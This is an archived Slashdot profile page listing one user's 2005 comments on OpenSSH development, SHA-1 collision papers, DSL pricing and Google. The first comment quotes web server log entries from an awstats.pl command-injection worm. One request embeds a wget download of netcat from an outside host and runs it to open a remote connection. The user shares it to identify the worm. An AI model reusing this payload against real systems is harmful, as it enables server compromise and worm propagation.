Slashdot Mirror


User: statemachine

statemachine's activity in the archive.

Stories
0
Comments
575
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 575

  1. Been in the wild since Feb. on Linux Lupper.Worm In the WIld · · Score: 1

    Or is this a different worm that exploits awstats?

    First scan at my webserver:

    xx.113.128.xxx - - [17/Feb/2005:04:36:36 -0800] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    Second scan:
    xxx.19.218.xx - - [18/Feb/2005:05:58:19 -0800] "GET //cgi/awstats.pl?configdir=|
    %20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    An attempt a few days (and a few scans) later which appears to be a self-sustaining worm:

    xx.221.80.xx - - [26/Feb/2005:18:30:46 -0800] "GET /cgi-bin/awstats.pl?configdir
    =%20%7c%20cd%20%2ftmp%3bwget%20www.ment0ru.home.ro %2fnc%3bchmod%20%2bx%20nc%3b.%
    2fnc%20something4u.propagation.net%2065000%20%7c%2 0 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

  2. Re:It does not help... on SSH Claims Draw Open Source Ire · · Score: 1

    And like last time, I told you that the problem is simply that OpenSSH wants to compile and run the binary during its tests. You do not need a cross-compile environment to fix this. There are too many "tests" that require running the binary for me to fix up into a nice package. They are easy to spot but tedious to correct/hack for each release.

    And like last time, I gave you the necessary information for you to find it. I don't have the time to hold your hand, nor formulate a good looking patch for you. And I'm damned sure that I'm not going to give out my contact information when your team and its sympathizers are full of immature brats.

    I've since recommended a different solution and moved on to a different project.

  3. Re:It does not help... on SSH Claims Draw Open Source Ire · · Score: 2, Insightful

    You are completely correct. This is OpenSSH's problem. Patches not getting folded in, responses like "where's YOUR patch, pickledick?", and the utter lack of OpenSSH programmers taking the initiative to fix stupid problems like cross-platform compiling on a non-target CPU.

    I don't doubt that OpenSSH is enterprise-class when compared with the likes of Microsoft's offerings or SSH Corp., but immature responses from the supposed "OpenSSH developers" that don't further to solve the problems really put people off.

    If OpenSSH would clean house of the wannabes and show some initiative and maturity, the OpenSSH team might get more respect from the outsiders.

  4. Re:Typical bureaucrat on NASA Admin Says Shuttle and ISS are Mistakes · · Score: 1

    "- Exactly what would Mr Smartypants have had us do with the money?"

    He would've put it in his pants and done the SmartyDance. Oooh Ah.

  5. Re:could just do what cable companies do... on FCC May Push Bells to Unbundle DSL · · Score: 1

    Interesting. Out here in San Jose, CA it's the way I've described. Must be regional...

  6. Re:could just do what cable companies do... on FCC May Push Bells to Unbundle DSL · · Score: 1

    You worded your statement oddly, so a reader might have some confusion. My apologies in advance if this offends you.

    Comcast HSI (High Speed Internet) by itself costs less than HSI + TV. However, if one buys the bundle, HSI gets a discount. But, the discounted HSI + TV still costs more than unbundled HSI!

  7. Misunderstood title? on Roundtable on Apple's Future · · Score: 1

    Did anyone else wonder why a pizza chain was commenting on a computer company?

  8. Re:Sadly True on Scientist Says Most Scientific Papers Are Wrong · · Score: 1

    ...but I'm generally ignored or told to fix it myself though that isn't my job.

    So true. Just like OpenSSH.

  9. Link to Actual Paper on Scientists Speed up Light · · Score: 2, Informative

    I'm not sure if anyone already posted the actual paper. ScienceBlog only links to itself and references a future printed publication. Well, here it is:

    http://www.opticsexpress.org/abstract.cfm?URI=OPEX -13-1-82

  10. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    You're still badgering me. I pointed out the version that I read and you're still acting like a troll.

    I won't apologize to you. You are a troll.

  11. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    Thank you for the link and the pointer to the text.

    I will concede that there was a link to *one* of the recently published papers, and had I examined every single link, I would have found *one* of those papers, albeit from a non-primary source.

    However, you must concede that "The authors have presented a collision for 58-round SHA-1, claimed to be found with 233 hash operations. The paper with a the full attack description is now online. [8]" is missing the reference in the later versions (the one I originally read):
    http://en.wikipedia.org/w/index.php?title=SHA_hash _functions&oldid=21330286
    Note that this phrase "* "Research paper containing the details of the attack on SHA-1" on Cryptome" that you quote is also missing from that version.

  12. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    Proof?

  13. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    You didn't even read my comment. Pot. Kettle. Black.

  14. Re:Sorry, no proof? on New, Faster Attack against SHA-1 Revealed · · Score: 1

    As I said in replies further down, the information I was seeking was added to Bruce's blog and to the Wiki *after* I posted my request.

    I honestly just wanted to see the papers. Since the links were not there, was my skepticism unfounded? Am I to blindly trust Bruce Schneier? (That may contradict everything I've read from him.)

  15. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    I forgot to add, the Wiki was updated with the papers only AFTER I posted my question.

    (cur) (last) 01:48, 19 August 2005 Matt Crypto (links for CRYPTO 2005 papers)

    Possibly Matt Crypto read my comment. Thank you Matt Crypto.

  16. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    quoth Schneier's blog:

    "EDITED TO ADD: Here are Xiaoyun Wang's two papers from Crypto this week: "Efficient Collision Search Attacks on SHA-0" and "Finding Collisions in the Full SHA-1Collision Search Attacks on SHA1." And here are the rest of her papers."

    When I read his blog (when the slashdot article appeared), there was no such reference. Apparently he read my comment. Thanks Bruce.

    By the way, clap_hands, you're still a troll.

  17. Re:links to papers on New, Faster Attack against SHA-1 Revealed · · Score: 1

    As I said in another reply, my apologies to you j1m+5n0w. While the article does not have any useful links, you did provide a link to the papers.

    That was the information I was asking for.

  18. Re:Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    They don't have direct links. If you consider a link to another Wiki article which links another page which links another page a direct link....

    *You* (clap_hands) have not provided any link. Only j1m+5n0w provided a link.

    And I apologize to j1m+5n0w because I see that he did provide a direct link to the papers. Neither of which was provided in the article, or Bruce's blog.

    But no apologies to you. You're merely trying to stir up trouble (hey! I didn't even reply to you until now, so why did you respond to my response to j1m+5n0w?).

  19. Links go back to Schneier blog with no proof on New, Faster Attack against SHA-1 Revealed · · Score: 1

    I didn't miss anything. The Wiki articles just reference Bruce's blog, which doesn't provide any proof.

    I don't see how you're modded informative, and I'm modded a troll, since I asked a valid question, and you didn't provide the answer.

    Please, *please* provide a link to the proof.

  20. Sorry, no proof? on New, Faster Attack against SHA-1 Revealed · · Score: 0, Troll

    Even the greats like Bruce can get hoaxed.

    This Chinese research team has yet to publish their proof for the last SHA attacks. Or maybe I missed it? Please show everyone the proof. I honestly want to be able to read the proof. Links, please.

    If it's real, withholding information on these attack vectors doesn't make it any safer for the rest of us who use SHA or any other algorithm.

  21. Sounds like OpenSSH on IBM Donates Code to Firefox · · Score: 1

    No useful documentation (provide your own!). No useful support (provide a patch!).

    Something tells me that most of these programmers have never worked on a commercial project with a deadline and with other people.

    Bunch of arrogant primadonnas. Just like OpenSSH.

  22. LoJack on RFID Tags in Law Enforcement · · Score: 1

    There's a stolen car tracking device called LoJack. It's international, too. Of course, you need to have it installed before the car is stolen.

  23. Re:Insider trades on Another Internet Stock Price Bubble Building? · · Score: 1

    Wow. They're minting money over at Google.
    http://finance.yahoo.com/q/it?s=GOOG

    Some large option exercise at $0 a share, followed by several smaller sales at market price. Ad infinitum.

    Create some stock, sell it. Create some more, sell some more. All the while keeping the same percentage of stock for themselves.

  24. Moderators are ridiculous on Google's Share of Searches Falling? Or Increasing? · · Score: 1

    How is the grandparent flamebait and my reply redundant?

    Obviously some member doesn't agree with either of us and wants to use his new mod points to silence a point of view.

    The moderation is utterly ridiculous. I'm not new here, but it's not any less insane to see it personally.

  25. Re:The earth is flat on Google's Share of Searches Falling? Or Increasing? · · Score: 0, Redundant

    So if I see some arbitrary absurdity on a line chart than it cancels all meaning of all other studies?

    Welcome to American politics.

    That technique is used to contradict Global Warming, evolution, environmental studies, and legalities that don't fit arrogant people's ignorant views.